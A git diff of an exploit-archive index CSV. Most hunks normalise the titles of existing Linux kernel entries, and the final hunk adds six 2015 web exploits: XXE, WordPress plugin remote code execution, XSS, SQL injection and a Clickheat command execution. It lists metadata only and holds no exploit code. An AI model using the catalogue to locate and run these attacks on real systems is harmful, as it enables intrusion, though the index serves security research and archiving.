diff --git a/files.csv b/files.csv
index 77cc5970a..a9527b365 100755
--- a/files.csv
+++ b/files.csv
@@ -135,7 +135,7 @@ id,file,description,date,author,platform,type,port
 138,platforms/php/webapps/138.pl,"PHP-NUKE <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
 140,platforms/linux/local/140.c,"Xsok 1.02 - ""-xsokdir"" Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0
-141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept",2004-01-06,"Christophe Devine",linux,local,0
+141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0
 142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - ""do_mremap"" Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0
 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
@@ -1162,7 +1162,7 @@ id,file,description,date,author,platform,type,port
 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0
 1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0
 1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0
-1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0
+1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0
 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0
 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0
 1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0
@@ -3245,7 +3245,7 @@ id,file,description,date,author,platform,type,port
 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0
 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0
 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0
-3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit",2007-03-27,"Robert Swiecki",linux,local,0
+3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0
 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0
 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (meta)",2007-03-27,skillTube,windows,remote,80
 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0
@@ -3253,7 +3253,7 @@ id,file,description,date,author,platform,type,port
 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0
 3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - (.PRS) Local Buffer Overflow Exploit",2007-03-28,"Jonathan So",windows,local,0
 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0
-3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0
+3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0
 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability",2007-03-28,GoLd_M,php,webapps,0
 3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0
 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability",2007-03-28,kezzap66345,php,webapps,0
@@ -8062,7 +8062,7 @@ id,file,description,date,author,platform,type,port
 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0
 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80
 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure Vulnerability",2009-04-27,SirGod,php,webapps,0
-8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
+8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0
 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0
 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0
@@ -8835,7 +8835,7 @@ id,file,description,date,author,platform,type,port
 9360,platforms/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - (.PLF) Universal BoF Exploit (SEH)",2009-08-04,"ThE g0bL!N",windows,local,0
 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC",2009-08-04,"Pankaj Kohli",windows,dos,0
 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC",2009-08-05,schnuddelbuddel,windows,dos,0
-9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0
+9363,platforms/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - procfs Kernel Memory Disclosure Exploit",2009-08-05,"Jon Oberheide",linux,local,0
 9364,platforms/windows/local/9364.py,"Tuniac 090517c - (.m3u ) Local File Crash PoC",2009-08-05,Dr_IDE,windows,local,0
 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 (afd/rfi) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0
@@ -12790,7 +12790,7 @@ id,file,description,date,author,platform,type,port
 14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x - BlindSQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
 14592,platforms/php/webapps/14592.txt,"Joomla Yellowpages SQL Injection Vulnerability",2010-08-09,"al bayraqim",php,webapps,0
 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
-14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
+14594,platforms/linux/dos/14594.py,"Linux Kernel <= 2.6.33.3 - SCTP INIT Remote DoS",2010-08-09,"Jon Oberheide",linux,dos,0
 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - CSRF Vulnerabilities",2010-08-09,pyw1414,php,webapps,0
 14596,platforms/php/webapps/14596.txt,"Joomla Component Amblog 1.0 - Multiple SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0
@@ -21147,7 +21147,7 @@ id,file,description,date,author,platform,type,port
 23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service Vulnerability",2004-04-09,"Donato Ferrante",linux,dos,0
 23944,platforms/windows/dos/23944.php,"Foxit Reader <= 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0
 23945,platforms/unix/dos/23945.txt,"Ettercap <= 0.7.5.1 - Stack Overflow Vulnerability",2013-01-07,"Sajjad Pourali",unix,dos,0
-23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 Sigqueue Blocking Denial of Service Vulnerability",2004-04-12,"Nikita V. Youshchenko",linux,dos,0
+23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service Vulnerability",2004-04-12,"Nikita V. Youshchenko",linux,dos,0
 23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 tiki-switch_theme.php theme Parameter XSS",2004-04-12,JeiAr,php,webapps,0
 23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 img/wiki_up Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0
 23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 tiki-map.phtml Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0
@@ -21240,7 +21240,7 @@ id,file,description,date,author,platform,type,port
 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection Vulnerability",2004-04-22,shr3kst3r,multiple,remote,0
 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 UMOD Manifest.INI Remote Arbitrary File Overwrite Vulnerability",2004-04-22,"Luigi Auriemma",multiple,remote,0
 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0
-24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0
+24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0
 24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0
 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0
 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0
@@ -21272,7 +21272,7 @@ id,file,description,date,author,platform,type,port
 24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
 24076,platforms/windows/remote/24076.txt,"Sambar 5.x Open Proxy and Authentication Bypass Vulnerability",2003-01-30,"David Endler",windows,remote,0
 24077,platforms/windows/remote/24077.txt,"Business Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability",2004-05-03,"Imperva Application Defense Center",windows,remote,0
-24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0
+24078,platforms/linux/local/24078.c,"PaX 2.6 Kernel Patch - Denial of Service Vulnerability",2004-05-03,Shadowinteger,linux,local,0
 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String Vulnerability",2004-05-03,"Nilanjan De",linux,remote,0
 24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 LIST Denial of Service Vulnerability",2004-05-04,storm,windows,dos,0
 24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 AddUser.CFM Administrator Command Execution Vulnerability",2004-05-05,"Stuart Jamieson",cfm,webapps,0
@@ -21855,7 +21855,7 @@ id,file,description,date,author,platform,type,port
 24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include Local Buffer Overflow Vulnerability",2004-10-18,xCrZx,linux,local,0
 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0
 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0
-24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0
+24696,platforms/linux/remote/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Vulnerability",2004-11-21,"Richard Hart",linux,remote,0
 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0
 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0
 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0
@@ -22429,10 +22429,10 @@ id,file,description,date,author,platform,type,port
 25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection Vulnerability",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0
 25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting Vulnerability",2005-03-26,Dcrab,php,webapps,0
 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability",2005-03-26,Dcrab,php,webapps,0
-25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (1)",2005-03-28,"ilja van sprundel",linux,local,0
-25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (2)",2005-04-08,qobaiashi,linux,local,0
-25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (3)",2005-10-19,backdoored.net,linux,local,0
-25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0
+25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (1)",2005-03-28,"ilja van sprundel",linux,local,0
+25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (2)",2005-04-08,qobaiashi,linux,local,0
+25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (3)",2005-10-19,backdoored.net,linux,local,0
+25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x - Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0
 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow Vulnerability",2005-03-28,"Luigi Auriemma",multiple,remote,0
 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0
 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80
@@ -22852,7 +22852,7 @@ id,file,description,date,author,platform,type,port
 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.PHP Remote File Include Vulnerability",2005-05-25,"rash ilusion",php,webapps,0
 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 Login.ASP SQL Injection Vulnerability",2005-05-25,Romty,asp,webapps,0
 25706,platforms/linux/remote/25706.cpp,"GNU Mailutils 0.6 Mail Email Header Buffer Overflow Vulnerability",2004-08-10,infamous41md,linux,remote,0
-25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
+25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0
 25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
@@ -23397,7 +23397,7 @@ id,file,description,date,author,platform,type,port
 26245,platforms/windows/local/26245.py,"Winamp 5.12 - (.m3u) Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0
 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass Vulnerability",2013-06-17,Chako,php,webapps,0
 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0
-26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0
+26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0
 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0
 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0
 26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0
@@ -24573,7 +24573,7 @@ id,file,description,date,author,platform,type,port
 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0
 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0
 27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0
-27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x.2.5.x/2.6.x Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
+27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
 27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.PHP SQL Injection Vulnerability",2003-03-23,r0t,php,webapps,0
 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting Vulnerability",2006-03-23,anonymous,jsp,webapps,0
 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability",2006-03-24,kspecial,cgi,webapps,0
@@ -24872,10 +24872,10 @@ id,file,description,date,author,platform,type,port
 27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.PHP Remote File Include Vulnerability",2006-04-28,O.U.T.L.A.W,php,webapps,0
 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x TIFFFetchData Integer Overflow Vulnerability",2006-04-28,"Tavis Ormandy",linux,dos,0
 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x Double Free Memory Corruption Vulnerability",2008-04-28,"Tavis Ormandy",linux,dos,0
-27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
+27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
 27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0
 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.PHP Remote File Include Vulnerability",2006-04-28,botan,php,webapps,0
-27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
+27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0
 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability",2006-04-29,Qex,php,webapps,0
 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80
 27855,platforms/php/webapps/27855.txt,"Vizra A_Login.PHP Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0
@@ -26931,7 +26931,7 @@ id,file,description,date,author,platform,type,port
 29823,platforms/php/dos/29823.c,"PHP <= 5.2.1 GD Extension WBMP File Integer Overflow Vulnerabilities",2007-04-07,"Ivan Fratric",php,dos,0
 29824,platforms/php/webapps/29824.txt,"QuizShock <= 1.6.1 - Auth.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0
 29825,platforms/php/webapps/29825.txt,"UBB.Threads <= 6.1.1 UBBThreads.PHP SQL Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0
-29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0
+29826,platforms/linux/dos/29826.txt,"Linux Kernel 2.6.x - AppleTalk ATalk_Sum_SKB Function Denial of Service Vulnerability",2007-04-09,"Jean Delvare",linux,dos,0
 29827,platforms/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 Keyboard.PHP Local File Include Vulnerability",2007-04-09,Liz0ziM,php,webapps,0
 29828,platforms/php/webapps/29828.html,"DeskPro 2.0.1 Login.PHP HTML Injection Vulnerability",2007-04-09,"John Martinelli",php,webapps,0
 29829,platforms/php/webapps/29829.txt,"Einfacher Passworschutz Index.PHP Cross-Site Scripting Vulnerability",2007-04-10,hackberry,php,webapps,0
@@ -30640,7 +30640,7 @@ id,file,description,date,author,platform,type,port
 33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include Vulnerability",2014-07-07,Vulnerability-Lab,ios,webapps,0
 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 BETA - 'list' Parameter Cross-Site Scripting Vulnerability",2010-01-18,indoushka,multiple,webapps,0
-34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
+34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass Vulnerability",2010-05-18,"Dan Rosenberg",linux,local,0
 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow Vulnerability",2010-05-18,"fl0 fl0w",windows,remote,0
 34003,platforms/php/webapps/34003.txt,"Percha Image Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
 34004,platforms/php/webapps/34004.txt,"Percha Fields Attach 1.0 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
@@ -32281,7 +32281,7 @@ id,file,description,date,author,platform,type,port
 35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
-35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
+35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
 35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80
@@ -32424,7 +32424,7 @@ id,file,description,date,author,platform,type,port
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection Vulnerability",2011-07-15,Lazmania61,php,webapps,0
 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
-35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0
+35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Vulnerability",2009-10-19,"R. Dominguez Veg",linux,local,0
 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection Vulnerability",2011-07-15,SOLVER,php,webapps,0
@@ -33489,3 +33489,18 @@ id,file,description,date,author,platform,type,port
 37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
 37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80
 37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80
+37110,platforms/java/webapps/37110.py,"Apache Jackrabbit WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080
+37111,platforms/php/webapps/37111.txt,"Wordpress MailChimp Subscribe Forms 1.1 Remote Code Execution",2015-05-26,woodspeed,php,webapps,80
+37112,platforms/php/webapps/37112.txt,"Wordpress church_admin Plugin 0.800 Stored XSS",2015-05-26,woodspeed,php,webapps,80
+37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80
+37114,platforms/jsp/webapps/37114.txt,"Sendio ESP Information Disclosure Vulnerability",2015-05-26,"Core Security",jsp,webapps,80
+37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0
